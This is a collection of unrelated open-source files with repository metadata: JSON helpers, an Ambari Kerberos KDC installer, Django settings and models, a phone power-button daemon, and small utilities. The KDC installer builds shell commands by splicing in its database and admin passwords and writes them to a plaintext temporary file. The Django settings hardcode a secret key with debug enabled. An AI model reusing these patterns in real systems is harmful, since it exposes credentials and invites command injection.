'float'> # 283 <type 'tuple'> # 19 <type 'long'> if isinstance(value, _simple_types): return value if isinstance(value, datetime.datetime): if convert_datetime: return timeutils.strtime(value) else: return value # value of itertools.count doesn't get caught by nasty_type_tests # and results in infinite loop when list(value) is called. if type(value) == itertools.count: return six.text_type(value) # FIXME(vish): Workaround for LP bug 852095. Without this workaround, # tests that raise an exception in a mocked method that # has a @wrap_exception with a notifier will fail. If # we up the dependency to 0.5.4 (when it is released) we # can remove this workaround. if getattr(value, '__module__', None) == 'mox': return 'mock' if level > max_depth: return '?' # The try block may not be necessary after the class check above, # but just in case ... try: recursive = functools.partial(to_primitive, convert_instances=convert_instances, convert_datetime=convert_datetime, level=level, max_depth=max_depth) if isinstance(value, dict): return dict((k, recursive(v)) for k, v in six.iteritems(value)) elif isinstance(value, (list, tuple)): return [recursive(lv) for lv in value] # It's not clear why xmlrpclib created their own DateTime type, but # for our purposes, make it a datetime type which is explicitly # handled if isinstance(value, xmlrpclib.DateTime): value = datetime.datetime(*tuple(value.timetuple())[:6]) if convert_datetime and isinstance(value, datetime.datetime): return timeutils.strtime(value) elif isinstance(value, gettextutils.Message): return value.data elif hasattr(value, 'iteritems'): return recursive(dict(value.iteritems()), level=level + 1) elif hasattr(value, '__iter__'): return recursive(list(value)) elif convert_instances and hasattr(value, '__dict__'): # Likely an instance of something. Watch for cycles. # Ignore class member vars. return recursive(value.__dict__, level=level + 1) elif netaddr and isinstance(value, netaddr.IPAddress): return six.text_type(value) else: if any(test(value) for test in _nasty_type_tests): return six.text_type(value) return value except TypeError: # Class objects are tricky since they may define something like # __iter__ defined but it isn't callable as list(). return six.text_type(value) def dumps(value, default=to_primitive, **kwargs): return json.dumps(value, default=default, **kwargs) def loads(s): return json.loads(s) def load(s): return json.load(s) try: import anyjson except ImportError: pass else: anyjson._modules.append((__name__, 'dumps', TypeError, 'loads', ValueError, 'load')) anyjson.force_implementation(__name__)
f8de0cc0211fe9b16c552b419529d6119fef0e83
89a00777e75a1e7ad0394fccbd38eb74438e483b
/package/scripts/master.py
87441b4de46dceffd484fe506614d5cb70938609
[]
no_license
damienclaveau/kdc-stack
9258aac2324fcd03a863964722e04207ca747255
a7b247ef5e0767c981e2772b260a2c46aaa3864c
refs/heads/master
2021-01-21T00:43:38.052940
2015-03-17T05:12:42
2015-03-17T05:12:42
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,990
py
import sys, os, pwd, signal, time from resource_management import * from subprocess import call class Master(Script): def install(self, env): # Install packages listed in metainfo.xml self.install_packages(env) self.configure(env) import params Execute('sed -i "s/EXAMPLE.COM/'+params.kdc_realm+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf') Execute('sed -i "s/kerberos.example.com/'+params.kdc_host+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf') Execute('sed -i "s/example.com/'+params.kdc_domain+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf') Execute('/bin/cp -f /var/lib/ambari-server/resources/scripts/krb5.conf /etc') Execute('echo "'+params.kdb_password+'" > passwd.txt') Execute('echo "'+params.kdb_password+'" >> passwd.txt') Execute('echo >> passwd.txt') Execute('kdb5_util create -s < passwd.txt') Execute('rm passwd.txt') Execute('/etc/rc.d/init.d/krb5kdc start') Execute('/etc/rc.d/init.d/kadmin start') Execute('chkconfig krb5kdc on') Execute('chkconfig kadmin on') Execute('echo "'+params.kdc_adminpassword+'" > passwd.txt') Execute('echo "'+params.kdc_adminpassword+'" >> passwd.txt') Execute('echo >> passwd.txt') Execute('kadmin.local -q "addprinc '+params.kdc_admin+'" < passwd.txt') Execute('rm passwd.txt') Execute('echo "*/[email protected] *" > /var/kerberos/krb5kdc/kadm5.acl') #Execute('/etc/rc.d/init.d/krb5kdc restart') #Execute('/etc/rc.d/init.d/kadmin restart') def configure(self, env): import params env.set_params(params) def stop(self, env): import params Execute('service krb5kdc stop') Execute('service kadmin stop') def start(self, env): import params Execute('service krb5kdc start') Execute('service kadmin start') def status(self, env): import params Execute('service krb5kdc status') if __name__ == "__main__": Master().execute()
c35de16dd47821fb8bd0c74d9ed293dc5ee70956
34ef83114e02b173bd2d55eb53ad399e738a8e3c
/django/code_test/teka/teka/settings.py
ca05f4f1f4426561e47f91918dae0a82be1e722d
[]
no_license
vavilon/Python3
e976a18eb301e4953696d1e3f4730ed890da015a
8c79729747ce51d60ad685e6a2e58292954ed7eb
refs/heads/master
2023-01-09T13:44:37.408601
2018-01-25T22:41:14
2018-01-25T22:41:14
100,892,055
0
1
null
2022-12-26T20:29:27
2017-08-20T22:23:06
Python
UTF-8
Python
false
false
3,232
py
""" Django settings for teka project. Generated by 'django-admin startproject' using Django 1.11. For more information on this file, see https://docs.djangoproject.com/en/1.11/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.11/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '7&(=23s0&zbaks8=)r=a=5xb^mz61l1&m2&=to8_j*2h^c0ld9' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'apps', 'bootstrap3', 'bootstrap4', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'teka.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'teka.wsgi.application' # Database # https://docs.djangoproject.com/en/1.11/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.11/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.11/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = ( os.path.join(BASE_DIR, "static")),
71bb3fad91cbbcdcb44e3c33d83d4877eb1fb75d
4324bfea818c8fa11f991f9eac24c6251db35dd5
/keycoded.py
51fb02586af64cac9a36340c024ddb635dc7c156
[]
no_license
gjedeer/htc-vision-postmarketos
d368c13fd843c171d51e47cef786fa5f807fb03a
17840dd6fd382667af6846851e4d6710497dc759
refs/heads/master
2020-05-18T21:19:36.159309
2019-05-02T22:35:48
2019-05-02T22:35:48
184,657,935
0
0
null
null
null
null
UTF-8
Python
false
false
1,943
py
#!/usr/bin/python import struct import time import sys import os infile_path = "/dev/input/event" + (sys.argv[1] if len(sys.argv) > 1 else "3") #long int, long int, unsigned short, unsigned short, unsigned int FORMAT = 'llHHI' EVENT_SIZE = struct.calcsize(FORMAT) framebuffer = int(os.getenv('FRAMEBUFFER', 0)) #open file in binary mode in_file = open(infile_path, "rb") buf = "" POWER_BUTTON = 116 KEYUP = 0 KEYDOWN = 1 FB_BLANK_PATH = '/sys/class/graphics/fb%d/blank' % framebuffer fb_blank = 0 power_key_down = None def is_blank(): return fb_blank def toggle_blank(): global fb_blank blank = is_blank() print "Blank: %d" % fb_blank with open(FB_BLANK_PATH, 'w') as f: f.write("%d" % int(not blank)) fb_blank = int(not blank) print "Blank: %d" % fb_blank while True: buf += in_file.read(1) if len(buf) >= EVENT_SIZE: event = buf[:EVENT_SIZE] buf = buf[EVENT_SIZE:] (tv_sec, tv_usec, type, code, value) = struct.unpack(FORMAT, event) if type != 0 or code != 0 or value != 0: print("Event type %u, code %u, value %u at %d.%d" % \ (type, code, value, tv_sec, tv_usec)) if type == 1: if code == POWER_BUTTON: if value == KEYUP: power_key_up = tv_sec + 0.000001 * tv_usec if power_key_down and power_key_up - power_key_down > 5: print "SHUTDOWN" os.system("poweroff") else: toggle_blank() power_key_down = None elif value == KEYDOWN: power_key_down = tv_sec + 0.000001 * tv_usec else: # Events with code, type and value == 0 are "separator" events print("===========================================") in_file.close()
33297c80981be4147b2f9bbef3eef38f163010b9
d509fb7b7a0a35bf752f977417d2b3119a00b084
/wordsiv/punctuation.py
63dcdad8de6602be16fda7c1bb7c737d55fbb405
[ "MIT", "LicenseRef-scancode-public-domain" ]
permissive
tallpauley/wordsiv
c0904fc9fa8a6032a06a9cfb3b3cadc6373ca2da
935e6a08cd39134b7408b67d6ff721830d03a5ec
refs/heads/main
2023-05-10T04:32:39.135705
2021-05-20T21:26:22
2021-05-20T21:26:22
357,676,771
24
1
MIT
2021-05-20T21:26:23
2021-04-13T20:12:55
Python
UTF-8
Python
false
false
2,341
py
def default_punc_func(words, rand, start, end, inner, wrap): # Sort of derived from wikipedia, but increased freq of lesser used punctuation # https://en.wikipedia.org/wiki/English_punctuation#Frequency # place "inner" punctuation (like comma, hyphen, etc) insert_index = rand.randrange(len(words) - 1) words[insert_index] = words[insert_index] + inner # place surrounding punctuation return wrap[0] + start + " ".join(words) + end + wrap[1] def random_available(option_weight, glyphs_string, rand): options, weights = zip( *{ cs: prob for cs, prob in option_weight.items() if all(c in glyphs_string for c in cs) }.items() ) return rand.choices(options, weights=weights, k=1)[0] def punctuate(words, glyphs_string, rand, language, punc_func=None): """Punctuate a list of words and join into a sentence using punc_func Example w/ no punc available: >>> import random >>> words = ["hamburger", "fonts", "vise", "gurb", "ram"] >>> glyphs_string = 'HAMBURGERFONTSIVhamburgerfontsiv' >>> rand = random.Random(5) >>> punctuate(words, glyphs_string, rand, "en", default_punc_func) 'hamburger fonts vise gurb ram' Example w/ punc available: >>> glyphs_string = 'HAMBURGERFONTSIVhamburgerfontsiv.,' >>> punctuate(words, glyphs_string, rand, "en", default_punc_func) 'hamburger fonts vise gurb ram.' """ if not punc_func: punc_func = default_punc_func start = random_available( default_punctuation[language]["start"], glyphs_string, rand ) end = random_available(default_punctuation[language]["end"], glyphs_string, rand) inner = random_available( default_punctuation[language]["inner"], glyphs_string, rand ) wrap = random_available(default_punctuation[language]["wrap"], glyphs_string, rand) return punc_func(words, rand, start, end, inner, wrap) default_punctuation = { "en": { "start": {"": 100}, # make no ending punctuation extremely low probability so # it only happens when period is not available "end": {"": 0.00001, ".": 100, "?": 40, "!": 20}, "inner": {"": 100, ",": 60, "—": 40, ":": 30, ";": 20}, "wrap": {("", ""): 100, ("“", "”"): 9, ("‘", "’"): 6}, } }
8e7f5dcc339c5006d5ba09592c2e38aaa9eda380
4a8318fb3775476b3cb849ef32426ced6bbb86e5
/py/p030.py
8a50ec6b350ba080f2b666f7e54dceb587c24fcd
[]
no_license
zellyn/project-euler
422de8387320ebb9b7a978e348dd7e12e1048352
087061f007350ac2c210c5ef19f1ccc3d89dea35
refs/heads/master
2021-01-21T05:00:15.903675
2020-01-17T14:21:44
2020-01-17T14:21:44
154,268
1
0
null
null
null
null
UTF-8
Python
false
false
459
py
#!/usr/bin/env python # Project Euler # Problem 30 # # Find the sum of all the numbers that can be written as the sum of # fifth powers of their digits. def fifth_power_eq(n): sum = 0 i = n while i: sum += (i % 10) ** 5 i //= 10 return sum == n def p030(): nums = [] for n in xrange(2, 999999): if fifth_power_eq(n): nums.append(n) return sum(nums) if __name__=='__main__': print p030()
44a0a7737d19c1e6e47ddf5525d0d632188aabd2
10f397d1fe8c68dc5af033e0b88cb99be56bc4f2
/Statistics/models.py
28a3d7a4f4138e1e4c55db79c7ee134721781ded
[]
no_license
wsqy/AccountRandmomAmount
db3905bd425c074935c256aab62f437fe7cb0ffc
b69bc1269a666c48fe954ac423a25d111e01176b
refs/heads/master
2023-06-29T12:49:35.947729
2020-06-30T03:27:05
2020-06-30T03:27:05
271,683,993
0
0
null
null
null
null
UTF-8
Python
false
false
3,592
py
from django.db import models # from django.conf import settings from django.utils import timezone from Account.models import Buyer, Seller, Company class DayBuyer(models.Model): """ 买方日交易额总量表 """ date = models.DateField(verbose_name='任务日期', default=timezone.now) buyer = models.ForeignKey(Buyer, on_delete=models.PROTECT, verbose_name='买方') amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0) class Meta: verbose_name = '买方日交易额总量' verbose_name_plural = verbose_name def __str__(self): return '{}于{}总交易额{}万元'.format(self.buyer, self.date, self.amount_total) class DaySeller(models.Model): """ 卖方日交易额总量表 """ date = models.DateField(verbose_name='任务日期', default=timezone.now) seller = models.ForeignKey(Seller, on_delete=models.PROTECT, verbose_name='卖方') amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0) class Meta: verbose_name = '卖方日交易额总量' verbose_name_plural = verbose_name def __str__(self): return '{}于{}总交易额{}万元'.format(self.seller, self.date, self.amount_total) class DayCompany(models.Model): """ 集团子公司日交易额总量表 """ date = models.DateField(verbose_name='任务日期', default=timezone.now) company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name='集团子公司') amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0) class Meta: verbose_name = '集团子公司日交易额总量' verbose_name_plural = verbose_name def __str__(self): return '{}于{}总交易额{}万元'.format(self.company, self.date, self.amount_total) class MouthBuyer(models.Model): """ 买方月交易额总量表 """ date = models.CharField(max_length=8, verbose_name='月份') buyer = models.ForeignKey(Buyer, on_delete=models.PROTECT, verbose_name='买方') amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0) class Meta: verbose_name = '买方月交易额总量' verbose_name_plural = verbose_name def __str__(self): return '{}于{}总交易额{}万元'.format(self.buyer, self.date, self.amount_total) class MouthSeller(models.Model): """ 卖方月交易额总量表 """ date = models.CharField(max_length=8, verbose_name='月份') seller = models.ForeignKey(Seller, on_delete=models.PROTECT, verbose_name='卖方') amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0) class Meta: verbose_name = '卖方月交易额总量' verbose_name_plural = verbose_name def __str__(self): return '{}于{}总交易额{}万元'.format(self.seller, self.date, self.amount_total) class MouthCompany(models.Model): """ 集团子公司月交易额总量表 """ date = models.CharField(max_length=8, verbose_name='月份') company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name='集团子公司') amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0) class Meta: verbose_name = '集团子公司月交易额总量' verbose_name_plural = verbose_name def __str__(self): return '{}于{}总交易额{}万元'.format(self.company, self.date, self.amount_total)
e625e4dba04302b5a4595e8647919e5ef1a21495
58be9ab3da7170fa6eea7c12a6d59e4960db3c66
/alumnos/Luis Omar/Actividad 02/Actividad-4.py
ed06d854f235496b0664261a1e9e191effe05757
[]
no_license
CodevEnsenada/actividades
08d39b9b53d8c10ad17204fa9ac5e313a940a4b3
862d6f983b7056957522d28686df1b0a323a9e6f
refs/heads/master
2022-04-09T03:47:32.373978
2020-03-16T20:17:14
2020-03-16T20:17:14
241,519,981
0
12
null
2020-03-16T20:17:15
2020-02-19T03:03:48
Python
UTF-8
Python
false
false
36
py
#act.4 a=18 b=2 suma=a+b print(suma)
88602e1e0e2ef39da01887596a86e434b79e849e
028afaa205e46e0db61707a84860fa5e34bd61aa
/my_emoji.py
50ffaaed40c18a77aaf96e8211a5dc06a70dfe55
[]
no_license
muriel27/mojo_python
d4f32142e9817621a319e3d4cbcc89d3a9771ddb
c5488d6d35992e932f91f5cae58a87515b0ee77e
refs/heads/master
2021-01-20T20:08:07.036918
2016-06-27T02:56:21
2016-06-27T02:56:21
61,265,888
0
0
null
null
null
null
UTF-8
Python
false
false
23,119
py
#__author__ = 'mjwei' from enum import Enum import os import operator import random class Category(Enum): People = 'people' Face ='face' CatFace ='catFace' MonkeyFace = 'monkeyFace' Transport = 'transport' Symbol = 'symbol' Animal = 'animal' Others = 'others' Plant = 'plant' Fruit = 'fruit' Food = 'food' Drink = 'drink' Instruments = 'instruments' Sport = 'sport' Building = 'building' Features = 'features' Direction = 'direction' Hand = 'hand' class Emoji(Enum): Grin = ('\U0001F601', Category.Face.name, ['happy','joy','grad']) Tear = ('\U0001F602', Category.Face.name, ['happy','joy','grad']) Smile = ('\U0001F603', Category.Face.name, ['happy','joy','grad','smiling']) Sweat = ('\U0001F605', Category.Face.name, ['happy','joy','grad','smiling']) XD = ('\U0001F606', Category.Face.name, ['happy','joy','grad','smiling']) Wink = ('\U0001F609', Category.Face.name, ['happy','joy','grad','smiling']) Savor = ('\U0001F60B', Category.Face.name, ['happy','joy','grad','smiling']) Relieve = ('\U0001F60C', Category.Face.name, ['none']) HeartShaped = ('\U0001F60D', Category.Face.name, ['love','happy','joy','grad','smiling']) Smirk = ('\U0001F60F', Category.Face.name, ['none']) Unamused = ('\U0001F612', Category.Face.name, ['none']) ColdSweat = ('\U0001F613', Category.Face.name, ['none']) Pensive = ('\U0001F614', Category.Face.name, ['none']) Confound = ('\U0001F616', Category.Face.name, ['confuse','puzzle']) Kiss = ('\U0001F618', Category.Face.name, ['none']) TongueFace = ('\U0001F61C',Category.Face.name, ['wink','stuck-out']) ClosedEyes = ('\U0001F61D', Category.Face.name, ['none']) Disappoint = ('\U0001F61E', Category.Face.name, ['none']) Angry = ('\U0001F620', Category.Face.name, ['none']) Pout = ('\U0001F621', Category.Face.name, ['none']) SadCry = ('\U0001F622', Category.Face.name, ['none']) Worry = ('\U0001F623', Category.Face.name, ['worried','persevere','persevering']) Triumph = ('\U0001F624', Category.Face.name, ['none']) Relieved = ('\U0001F625', Category.Face.name, ['disappoint']) Fear = ('\U0001F628', Category.Face.name, ['none']) Weary = ('\U0001F629', Category.Face.name, ['none']) Sleep = ('\U0001F62A', Category.Face.name, ['none']) Tired = ('\U0001F62B', Category.Face.name, ['none']) LoudCry = ('\U0001F62D', Category.Face.name, ['none']) Scream = ('\U0001F631', Category.Face.name, ['fear','shock','scare']) Astonished = ('\U0001F632', Category.Face.name, ['shock']) Flushed = ('\U0001F633', Category.Face.name, ['blush']) Dizzy = ('\U0001F635', Category.Face.name, ['none']) MedicalMask = ('\U0001F637', Category.Face.name, ['ill','sick']) GrinCat = ('\U0001F638', Category.CatFace.name, ['happy','joy','grad']) TearCat = ('\U0001F639', Category.CatFace.name, ['happy','joy','grad']) SmileCat = ('\U0001F63A', Category.CatFace.name, ['happy','joy','grad','smiling']) HeartShapedCat = ('\U0001F63B', Category.CatFace.name, ['love','happy','joy','grad','smiling']) WrySmileCat = ('\U0001F63C', Category.CatFace.name, ['none']) KissCat = ('\U0001F63D', Category.CatFace.name, ['none']) PoutCat = ('\U0001F63E', Category.CatFace.name, ['none']) SadCryCat = ('\U0001F63F', Category.CatFace.name, ['none']) NoGoodGesture = ('\U0001F645', Category.People.name, ['object','deny']) OkGesture = ('\U0001F646', Category.People.name, ['agree','yes']) Bowing = ('\U0001F647', Category.People.name, ['kneel']) SeeNoEvilMonkey = ('\U0001F648', Category.MonkeyFace.name, ['none']) HearNoEvilMonkey = ('\U0001F649', Category.MonkeyFace.name, ['none']) SpeakNoEvilMonkey = ('\U0001F64A', Category.MonkeyFace.name, ['none']) RaiseOneHand = ('\U0001F64B', Category.Face.name, ['raising']) RaiseBothHand = ('\U0001F64C', Category.Face.name, ['raising']) Frown = ('\U0001F64D', Category.Face.name, ['none']) FoldedHands = ('\U0001F64F', Category.Face.name, ['none']) Rocket = ('\U0001F680', Category.Transport.name, ['none']) RailwayCar = ('\U0001F683', Category.Transport.name, ['none']) HighSpeed = ('\U0001F684', Category.Transport.name, ['train']) HighSpeedBullet = ('\U0001F685', Category.Transport.name, ['train']) Metro = ('\U0001F687', Category.Transport.name, ['none']) Station = ('\U0001F689', Category.Transport.name, ['none']) Bus = ('\U0001F68C', Category.Transport.name, ['none']) BusStop = ('\U0001F68F', Category.Transport.name, ['none']) Ambulance = ('\U0001F691', Category.Transport.name, ['none']) FireEngine = ('\U0001F692', Category.Transport.name, ['none']) PoliceCar = ('\U0001F693', Category.Transport.name, ['none']) Taxi = ('\U0001F695', Category.Transport.name, ['none']) Automobile = ('\U0001F697', Category.Transport.name, ['car']) RecreationalVehicle = ('\U0001F699', Category.Transport.name, ['none']) DeliveryTruck = ('\U0001F69A', Category.Transport.name, ['none']) Ship = ('\U0001F6A2', Category.Transport.name, ['none']) Speedboat = ('\U0001F6A4', Category.Transport.name, ['none']) TrafficLight = ('\U0001F6A5', Category.Transport.name, ['horizontal']) ConstructionSign = ('\U0001F6A7', Category.Transport.name, ['none']) RevolvingLight = ('\U0001F6A8', Category.Transport.name, ['none']) TriangularFlag = ('\U0001F6A9', Category.Transport.name, ['on post']) Door = ('\U0001F6AA', Category.Transport.name, ['none']) NoEntry = ('\U0001F6AB', Category.Symbol.name, ['none']) SmokingSymbol = ('\U0001F6AC', Category.Symbol.name, ['sign']) NoSmokingSymbol = ('\U0001F6AD', Category.Symbol.name, ['sign']) Bicycle = ('\U0001F6B2', Category.Transport.name, ['sign']) Pedestrian = ('\U0001F6B6', Category.Transport.name, ['sign']) MenSymbol = ('\U0001F6B9', Category.Symbol.name, ['sign']) WomenSymbol = ('\U0001F6BA', Category.Symbol.name, ['sign']) Restroom = ('\U0001F6BB', Category.Symbol.name, ['bathroom']) BabySymbol = ('\U0001F6BC', Category.Symbol.name, ['sign']) Toilet = ('\U0001F6BD', Category.Symbol.name, ['bathroom','restroom']) WaterCloset = ('\U0001F6BE', Category.Symbol.name, ['wc']) Bath = ('\U0001F6C0', Category.Symbol.name, ['sign']) Rat = ('\U0001F400', Category.Animal.name, ['none']) Mouse = ('\U0001F401', Category.Animal.name, ['none']) Ox = ('\U0001F402', Category.Animal.name, ['none']) WaterBuffalo = ('\U0001F403', Category.Animal.name, ['none']) Cow = ('\U0001F404', Category.Animal.name, ['none']) Tiger = ('\U0001F405', Category.Animal.name, ['none']) Leopard = ('\U0001F406', Category.Animal.name, ['none']) Rabbit = ('\U0001F407', Category.Animal.name, ['none']) Cat = ('\U0001F408', Category.Animal.name, ['none']) Dragon = ('\U0001F409', Category.Animal.name, ['none']) Crocodile = ('\U0001F40A', Category.Animal.name, ['none']) Whale = ('\U0001F40B', Category.Animal.name, ['none']) Ram = ('\U0001F40F', Category.Animal.name, ['none']) Goat = ('\U0001F410', Category.Animal.name, ['none']) Rooster = ('\U0001F413', Category.Animal.name, ['none']) Dog = ('\U0001F415', Category.Animal.name, ['none']) Pig = ('\U0001F416', Category.Animal.name, ['none']) Camel = ('\U0001F42A', Category.Animal.name, ['none']) Watch = ('\U0000231A', Category.Others.name, ['none']) Hourglass = ('\U0000231B', Category.Others.name, ['none']) AlarmClock = ('\U000023F0', Category.Others.name, ['none']) Cloud = ('\U00002600', Category.Others.name, ['none']) Sun = ('\U00002601', Category.Others.name, ['none']) Telephone = ('\U0000260E', Category.Others.name, ['none']) Umbrella = ('\U00002614', Category.Others.name, ['none']) Cafe = ('\U00002615', Category.Others.name, ['coffee','beverage','hot']) WarningSign = ('\U000026A0', Category.Symbol.name, ['notice']) HighVoltageSign = ('\U000026A1', Category.Symbol.name, ['lightning']) Soccer = ('\U000026BD', Category.Others.name, ['football']) Snowman = ('\U000026C4', Category.Others.name, ['none']) Church = ('\U000026EA', Category.Others.name, ['none']) Sailboat = ('\U000026F5', Category.Others.name, ['none']) FuelPump = ('\U000026FD', Category.Others.name, ['none']) Star = ('\U00002B50', Category.Others.name, ['none']) Moon = ('\U0001F319', Category.Others.name, ['none']) Seed = ('\U0001F331', Category.Plant.name, ['none']) Palm = ('\U0001F334', Category.Others.name, ['tree']) Cactus = ('\U0001F335', Category.Others.name, ['none']) Tulip = ('\U0001F337', Category.Others.name, ['none']) CherryBlossom = ('\U0001F338', Category.Others.name, ['none']) Rose = ('\U0001F339', Category.Others.name, ['none']) Hibiscus = ('\U0001F33A', Category.Others.name, ['none']) Sunflower = ('\U0001F33B', Category.Others.name, ['none']) Blossom = ('\U0001F33C', Category.Others.name, ['none']) Maize = ('\U0001F33D', Category.Others.name, ['corn']) Rice = ('\U0001F33E', Category.Others.name, ['none']) Herb = ('\U0001F33F', Category.Others.name, ['none']) FourLeafClover = ('\U0001F340', Category.Others.name, ['none']) Maple = ('\U0001F341', Category.Others.name, ['leaf']) FallenLeaf = ('\U0001F342', Category.Others.name, ['none']) Mushroom = ('\U0001F344', Category.Others.name, ['none']) Tomato = ('\U0001F345', Category.Others.name, ['none']) Aubergine = ('\U0001F346', Category.Others.name, ['none']) Grapes = ('\U0001F347', Category.Fruit.name, ['none']) Melon = ('\U0001F348', Category.Fruit.name, ['none']) Watermelon = ('\U0001F349', Category.Fruit.name, ['none']) Tangerine = ('\U0001F34A', Category.Fruit.name, ['none']) Banana = ('\U0001F34C', Category.Fruit.name, ['none']) Pineapple = ('\U0001F34D', Category.Fruit.name, ['none']) RedApple = ('\U0001F34E', Category.Fruit.name, ['none']) GreenApple = ('\U0001F34F', Category.Fruit.name, ['none']) Peach = ('\U0001F351', Category.Fruit.name, ['none']) Cherries = ('\U0001F352', Category.Fruit.name, ['none']) Strawberry = ('\U0001F353', Category.Fruit.name, ['none']) Hamburger = ('\U0001F354', Category.Food.name, ['none']) Pizza = ('\U0001F355', Category.Food.name, ['none']) Bone = ('\U0001F356', Category.Food.name, ['meat']) PoultryLeg = ('\U0001F357', Category.Food.name, ['none']) RiceCracker = ('\U0001F358', Category.Food.name, ['none']) RiceBall = ('\U0001F359', Category.Food.name, ['none']) CookedRice = ('\U0001F35A', Category.Food.name, ['none']) CurryRice = ('\U0001F35B', Category.Food.name, ['none']) SteamingBowl = ('\U0001F35C', Category.Food.name, ['none']) Spaghetti = ('\U0001F35D', Category.Food.name, ['none']) Bread = ('\U0001F35E', Category.Food.name, ['none']) FrenchFries = ('\U0001F35F', Category.Food.name, ['none']) SweetPotato = ('\U0001F35E', Category.Food.name, ['none']) Dango = ('\U0001F361', Category.Food.name, ['none']) Oden = ('\U0001F362', Category.Food.name, ['none']) Sushi = ('\U0001F363', Category.Food.name, ['none']) FriedShrimp = ('\U0001F364', Category.Food.name, ['none']) FishCake = ('\U0001F365', Category.Food.name, ['none']) IceCream = ('\U0001F366', Category.Food.name, ['none']) ShavedIce = ('\U0001F367', Category.Food.name, ['none']) Doughnut = ('\U0001F369', Category.Food.name, ['none']) Cookie = ('\U0001F36A', Category.Food.name, ['none']) Chocolate = ('\U0001F36B', Category.Food.name, ['none']) Candy = ('\U0001F36C', Category.Food.name, ['none']) Lollipop = ('\U0001F36D', Category.Food.name, ['none']) Custard = ('\U0001F36E', Category.Food.name, ['none']) Honey = ('\U0001F36F', Category.Food.name, ['none']) Shortcake = ('\U0001F370', Category.Food.name, ['cake']) Bento = ('\U0001F371', Category.Food.name, ['box']) Pot = ('\U0001F372', Category.Food.name, ['none']) Cook = ('\U0001F373', Category.Food.name, ['none']) ForkKnife = ('\U0001F374', Category.Food.name, ['none']) Wine = ('\U0001F377', Category.Drink.name, ['none']) Cocktail = ('\U0001F378', Category.Drink.name, ['none']) Tropical = ('\U0001F379', Category.Drink.name, ['none']) Beer = ('\U0001F37A', Category.Drink.name, ['none']) Ribbon = ('\U0001F380', Category.Others.name, ['none']) Present = ('\U0001F381', Category.Others.name, ['none']) JackOLantern = ('\U0001F383', Category.Others.name, ['none']) ChristmasTree = ('\U0001F384', Category.Others.name, ['none']) FatherChristmas = ('\U0001F385', Category.Others.name, ['none']) Fireworks = ('\U0001F386', Category.Others.name, ['none']) Balloon = ('\U0001F388', Category.Others.name, ['none']) WindChime = ('\U0001F390', Category.Others.name, ['none']) SchoolSatchel = ('\U0001F392', Category.Others.name, ['none']) GraduationCap = ('\U0001F393', Category.Others.name, ['none']) Microphone = ('\U0001F3A4', Category.Others.name, ['none']) Camera = ('\U0001F3A5', Category.Others.name, ['none']) Palette = ('\U0001F3A8', Category.Others.name, ['none']) Hat = ('\U0001F3A9', Category.Others.name, ['none']) Circus = ('\U0001F3AA', Category.Others.name, ['tent']) Ticket = ('\U0001F3AB', Category.Others.name, ['none']) ClapperBoard = ('\U0001F3AC', Category.Others.name, ['none']) VideoGame = ('\U0001F3AE', Category.Others.name, ['none']) SlotMachine = ('\U0001F3B0', Category.Others.name, ['none']) GameDie = ('\U0001F3B2', Category.Others.name, ['none']) Bowling = ('\U0001F3B3', Category.Others.name, ['none']) MusicalNote = ('\U0001F3B5', Category.Instruments.name, ['none']) Saxophone = ('\U0001F3B7', Category.Instruments.name, ['none']) Guitar = ('\U0001F3B8', Category.Instruments.name, ['none']) Keyboard = ('\U0001F3B9', Category.Instruments.name, ['none']) Trumpet = ('\U0001F3BA', Category.Instruments.name, ['none']) Violin = ('\U0001F3BB', Category.Instruments.name, ['none']) MusicalScore = ('\U0001F3BC', Category.Instruments.name, ['none']) Tennis = ('\U0001F3BE', Category.Sport.name, ['none']) SkiBoot = 